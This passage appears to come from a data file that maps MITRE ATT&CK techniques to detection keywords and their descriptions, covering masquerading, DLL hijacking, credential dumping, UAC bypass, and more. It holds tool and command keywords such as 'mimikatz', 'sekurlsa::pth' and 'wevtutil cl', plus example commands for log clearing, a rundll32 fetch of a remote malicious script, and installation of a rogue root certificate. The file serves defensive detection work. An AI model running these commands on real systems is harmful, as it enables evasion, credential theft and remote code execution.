Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe". ### Linux Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)
t1038 DLL Search Order Hijacking %systemroot% Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
t1039 Data from Network Shared Drive net use Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
t1040 Network Sniffing tcpdump Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.
t1042 Change Default File Association \command When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)
t1044 File System Permissions Weakness %temp% Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. ### Services Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable. ### Executable Installers Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)
t1046 Network Service Scanning nmap,dev/tcp Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
t1047 Windows Management Instrumentation wmic Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
t1049 System Network Connections Discovery net use,lsof,netstat,net file Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. ### Windows Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). ### Mac and Linux In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session".
t1050 New Service net start When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).
t1053 Scheduled Task svchost,schtasks,schtasks /create,/st Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security) An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
t1057 Process Discovery tasklist,tasklist /v Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. ### Windows An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility. ### Mac and Linux In Mac and Linux, this is accomplished with the ps command.
t1059 Command-Line Interface cmd.exe,netsh,cmd.exe /c Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
t1069 Permission Groups Discovery groups,net localgroup,net group Adversaries may attempt to find local system or domain-level groups and permissions settings. ### Windows Examples of commands that can list groups are net group /domain and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility. ### Mac On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . -list /Groups for local groups. ### Linux On Linux, local groups can be enumerated with the groups command and domain groups via the ldapsearch command.
t1070 Indicator Removal on Host wevtutil cl,var/log/ Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* . Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. ### Clear Windows Event Logs Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security. Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities. The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).
t1074 Data Staged \system Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
t1075 Pass the Hash sekurlsa::pth Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
t1077 Windows Admin Shares ipc$,net use,admin$ Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares) The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)
t1078 Valid Accounts wmic Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. Accounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. Default accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module) The overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
t1081 Credentials in Files dpapi,mimikatz Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
t1082 System Information Discovery ver ,hostname,systeminfo,/proc/cpuinfo,dir An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. ### Windows Example commands and utilities that obtain this information include ver, [Systeminfo](https://attack.mitre.org/software/S0096), and dir within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories. ### Mac On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.
t1083 File and Directory Discovery find ,dir ,locate Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. ### Windows Example utilities used to obtain this information are dir and tree. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API. ### Mac and Linux In Mac and Linux, this kind of discovery is accomplished with the ls, find, and locate commands.
t1085 Rundll32 control_rundll,rundll32.exe,wmic The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
t1086 PowerShell powershell PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. Administrator permissions are required to use PowerShell to connect to remote systems. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)
t1087 Account Discovery net localgroup,net group,net user,etc/master.passwd,/domain,etc/passwd Adversaries may attempt to get a listing of local system or domain accounts. ### Windows Example commands that can acquire this information are net user, net group , and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. ### Mac On Mac, groups can be enumerated through the groups and id commands. In mac specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate groups and users. ### Linux On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. Also, groups can be enumerated through the groups and id commands.
t1088 Bypass User Account Control eventvwr Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit) Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
t1089 Disabling Security Tools taskkill Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
t1096 NTFS File Attributes -stream Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
t1099 Timestomp touch Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
t1100 Web Shell A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
t1101 Security Support Provider install-ssp Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)
t1102 Web Service net use Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
t1105 Remote File Copy scp Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).
t1106 Execution through API cmd.exe,powershell.exe,createprocess Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess) Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier) * CreateProcessA() and CreateProcessW(), * CreateProcessAsUserA() and CreateProcessAsUserW(), * CreateProcessInternalA() and CreateProcessInternalW(), * CreateProcessWithLogonW(), CreateProcessWithTokenW(), * LoadLibraryA() and LoadLibraryW(), * LoadLibraryExA() and LoadLibraryExW(), * LoadModule(), * LoadPackagedLibrary(), * WinExec(), * ShellExecuteA() and ShellExecuteW(), * ShellExecuteExA() and ShellExecuteExW()
t1107 File Deletion del Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
t1110 Brute Force net use Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking) Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
t1112 Modify Registry \inprocserver32,enablelua Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples). Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.
t1113 Screen Capture screencapture Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. ### Mac On OSX, the native command screencapture is used to capture screenshots. ### Linux On Linux, there is the native command xwd. (Citation: Antiquated Mac Malware)
t1122 Component Object Model Hijacking inprocserver32 The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
t1126 Network Share Connection Removal net use Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use) Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
t1129 Execution through Module Load %programfiles%,%systemroot% The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries can use this functionality as a way to execute arbitrary code on a system.
t1130 Install Root Certificate certutil Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental) Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish) Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)
t1134 Access Token Manipulation createprocessasuser,duplicatetokenex,runas,duplicatetoken,logonuser Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. (Citation: Microsoft runas) Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation) Access tokens can be leveraged by adversaries through three methods: (Citation: BlackHat Atkinson Winchester Token Manipulation) **Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system. **Create Process with a Token** - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user. **Make and Impersonate Token** - An adversary has a username and password but the user is not 